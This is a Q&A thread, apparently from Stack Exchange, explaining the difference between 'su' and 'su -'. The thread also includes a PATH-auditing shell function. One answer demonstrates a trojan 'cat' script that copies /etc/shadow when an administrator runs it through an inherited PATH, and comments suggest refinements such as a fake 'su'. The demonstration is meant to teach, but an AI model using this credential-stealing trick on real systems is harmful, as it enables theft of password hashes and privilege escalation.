I don't understand why su - is preferred over su to login as root.
4 Answers
su - invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.
su just switches the user, providing a normal shell with an environment nearly the same as with the old user.
Imagine, you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.
$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0
$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"
Now, you ask your admin why you can't cat the dummy file in your home folder, it just won't work!
$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!
If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:
$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit
Wow! Thanks, super admin!
$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy
He, he.
You may have noticed that the corrupted $PATH variable was not reset. This wouldn't have happened if the admin had invoked su - instead.
- -- is a flag that most programs interpret as "nothing after this should be taken as a flag". Useful for grepping for things which start with a dash. – David Mackintosh, Feb 9, 2011 at 4:43
- Don't forget to set a umask like 000 or it won't work. – Lekensteyn, Oct 22, 2011 at 8:48
- One could as well just put a su file inside the PATH. It's not so hard to mimic the behavior of the real su. The super-user has been careless anyway :-) – Stéphane Gimenez, Feb 28, 2012 at 18:53
- su -- is NOT the same as su - : -- tells a getopt(s) (or similar) option handler to stop processing the command line for further options (useful for example if the rest contains filenames which could start with a '-'). I.e., in "rm -i -- -f", -f is then treated as a regular argument, so here as the name of the file to rm -i, and not as an additional -f option to the rm command. So su -- is just su and not su - ! So su -- would be as unsafe in the (funny and instructive) example given by wag. Use su -. – Olivier Dulac, Dec 26, 2012 at 15:05
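The inherited-PATH problem shown in the first answer can be checked for from the root side. The following is an added example, not part of the original answers: a POSIX shell function that flags PATH entries root should not trust (relative or empty entries, directories writable by group or others, directories not owned by the trusted UID). The function name audit_path and its output labels are made up for this illustration.

```shell
#!/bin/sh
# Added example: audit a PATH string before trusting it in a root shell
# that was entered with plain `su` (which keeps the caller's PATH).
# Usage: audit_path PATH_STRING [TRUSTED_UID]   (TRUSTED_UID defaults to 0)
# Prints one "reason<TAB>entry" line per risky entry; exit status 1 if any.
audit_path() (
    trusted_uid=${2:-0}
    status=0
    p=$1:           # trailing ':' so a trailing empty entry is not lost
    set -f          # no globbing while the PATH string is split
    IFS=:
    for dir in $p; do
        case $dir in
            /*) ;;
            *)  # "", "." and other relative entries resolve against the cwd
                printf 'relative\t%s\n' "${dir:-<empty>}"; status=1
                continue ;;
        esac
        [ -d "$dir" ] || continue       # nonexistent entries are skipped
        # -L follows symlinks (e.g. /bin -> usr/bin), -n prints numeric UIDs
        meta=$(ls -ldnL "$dir" | awk '{print $1, $3}')
        perms=${meta% *} uid=${meta#* }
        case $perms in
            # 6th character = group write bit, 9th = other write bit
            ?????w*|????????w*) printf 'writable\t%s\n' "$dir"; status=1 ;;
        esac
        if [ "$uid" != "$trusted_uid" ]; then
            printf 'owner-uid-%s\t%s\n' "$uid" "$dir"; status=1
        fi
    done
    exit "$status"
)

# Demo: audit the PATH of the current shell.
audit_path "$PATH" || echo "PATH contains entries root should not trust" >&2
```

Run as root after a plain su, a directory like the /tmp/evil_bin from the answer above would be reported as owned by a non-root UID.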
su - logs you in completely as root, whereas su makes it so you are pretending to be root.
The most obvious example of this is that ~ is root's home directory if you use su -, but your own home directory if you use su.
Depending on your system, it may also mean differences in prompt, PATH, or history file.
So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using su -, but if you are both using su, there may be differences due to you having different shell configurations.
On the other hand, if you want to run a command as root but using your own configuration, then maybe su is better for you.
Also don't forget about sudo, which has a -s option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.
- When I "su" I get ~ and $HOME both evaluating to /root. Is the behavior you describe specific to certain shells or OS versions or something? It's my understanding that ~ can be expanded by the kernel. I've got zsh as my (and root's) shell. – JasonWoof, Feb 8, 2011 at 0:05
- Your .bashrc or /etc/bashrc or /etc/profile.d scripts are setting PATH. Look for if [ $UID -eq 0 ] or something like that. – Mikel, Feb 8, 2011 at 1:14
- $USER for example is left unchanged. – peterph, Jan 30, 2014 at 11:13
- What about sudo su? – Simon Kuang, Jul 18, 2014 at 20:10
- Your example does not work for me. I get the same directory resolved in either way. – Daniel W., Apr 18, 2016 at 14:45
The main difference is:
su - username sets up the shell environment as if it were a clean login as the specified user; it accesses and uses the specified user's environment variables.
su username just starts a shell with current environment settings for the specified user.
If username is not specified with su and su -, the root account is implied as default.
I use su -- when I'm in a directory as a regular user but want to switch to root and remain in the same directory after the switch. When you use su - it switches the user to root and also takes you to /root, which is the root home directory.
- Or / or whatever is defined as root's home directory – Jun 7, 2018 at 23:42